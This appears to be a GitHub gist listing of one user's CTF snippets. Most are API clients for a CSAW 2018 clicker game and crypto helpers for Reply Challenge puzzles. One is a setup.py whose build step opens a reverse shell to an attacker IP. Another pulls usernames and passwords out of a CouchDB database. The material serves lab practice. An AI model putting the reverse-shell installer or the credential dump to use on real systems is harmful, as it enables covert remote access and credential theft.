Ge0rg3
/ Clicker-PartE.py
Created
September 30, 2018 19:33
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import json | |
| url = "http://web.chal.csaw.io:10106/" | |
| def register(userpass): | |
| global auth | |
| if len(userpass) < 8: | |
| return "Please enter at least 8 characters." | |
| details = { | |
| "username":userpass, |
Ge0rg3
/ Clicker-PartD.py
Last active
October 8, 2018 09:58
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def stats(): | |
| global auth | |
| userinfo = rq.get("http://web.chal.csaw.io:10106/user", headers=auth).json() | |
| userclickers = json.loads(rq.get("http://web.chal.csaw.io:10106/clicker/user", headers=auth).json().replace("'",'"')) | |
| print("##########\nStats for "+userinfo['username']+":") | |
| print("##########") | |
| print("Money: "+str(userinfo['money'])) | |
| print("##########\nClicker Name | Clicker Value | Clicker Price\n"+("----------"*5)) | |
| for count, i in enumerate(userclickers): | |
| print(i['name']+" | "+str(i['value'])+" | "+str(i['price'])) |
Ge0rg3
/ Clicker-PartC.py
Created
September 29, 2018 23:36
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def click(clicker): | |
| global authorization | |
| data={'name':clicker} | |
| req = rq.post("http://web.chal.csaw.io:10106/clicker/click", headers=authorization, json=data) | |
| if req.json()['status'] == "success": | |
| return "Success!" | |
| elif req.json()['message'] == "Clicker not owned": | |
| return "Clicker not owned." | |
| else: | |
| return "Clicker does not exist." |
Ge0rg3
/ Clicker-PartB.py
Created
September 29, 2018 23:30
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def purchase(clicker): | |
| global authorization | |
| data={'name':clicker} | |
| req = rq.post("http://web.chal.csaw.io:10106/clicker/purchase", headers=authorization, json=data) | |
| if req.json()['status'] == "success": | |
| return "Success!" | |
| else: | |
| return "Error." |
Ge0rg3
/ Clicker-PartA.py
Last active
October 8, 2018 09:58
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| url = "http://web.chal.csaw.io:10106/" | |
| def register(userpass): | |
| if len(userpass) < 8: | |
| return "Please enter at least 8 characters." | |
| details = { | |
| "username":userpass, | |
| "password":userpass, | |
| } |
Ge0rg3
/ Word-Descrambler.py
Created
September 23, 2018 16:04
Part of the Reply Challenge 2018 Practice Challenges.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| descrambled = [] | |
| concword = "" | |
| with open('scrambled-words.txt','r') as f: | |
| scrambledwords = f.read().split() | |
| with open('dictionary.txt','r') as f: | |
| dictionary = f.read().split() |
Ge0rg3
/ AES-Bruteforce-Last-Bit.html
Created
September 23, 2018 13:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha256.js"></script> | |
| <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> | |
| <script> | |
| function hex2a(hex) { | |
| var str = ''; | |
| for (var i = 0; i < hex.length; i += 2) | |
| str += String.fromCharCode(parseInt(hex.substr(i, 2), 16)); | |
| return str; | |
| } |
Ge0rg3
/ Js4u7h.html
Last active
October 8, 2018 09:58
Part of the Reply Challenge 2018 Practice Challenges.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function auth() { | |
| var k = CryptoJS.SHA256("\x93\x39\x02\x49\x83\x02\x82\xf3\x23\xf8\xd3\x13\x##"); // ops...missing last byte! | |
| var u = document.getElementById("user").value; | |
| var p = document.getElementById("pass").value; | |
| var t = false; | |
| if(u == "\x68\x34\x63\x6b\x33\x72") { | |
| var enc = CryptoJS.AES.encrypt(p, CryptoJS.enc.Hex.parse(k.toString().substring(0,32)), { iv: CryptoJS.enc.Hex.parse(k.toString().substring(32,64)) }); | |
| if(enc == "PKhuCrfh3RUw4vie3OMa8z4kcww1i7198ly0Q4rpuyA=") { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from distutils.command.build_py import build_py as _build_py | |
| from distutils.command.build_py import build_py as _build_py | |
| from distutils.core import setup | |
| import socket, subprocess, os | |
| class build_py(_build_py): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(("10.10.15.xxx",1339)) | |
| os.dup2(s.fileno(),0) | |
| os.dup2(s.fileno(),1) |
Ge0rg3
/ CouchDB_User_Parser.py
Created
September 14, 2018 22:04
Used for grabbing usernames/passwords from a CouchDB database.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Retrieves passwords for Canape CouchDB Users | |
| import requests as rq | |
| url = "http://george:george@localhost:5984/passwords/" | |
| alldocs = rq.get(url+"_all_docs").json() | |
| for i in alldocs["rows"]: | |
| entry_id = str(i["id"]) | |
| ret = rq.get(url+entry_id).json() |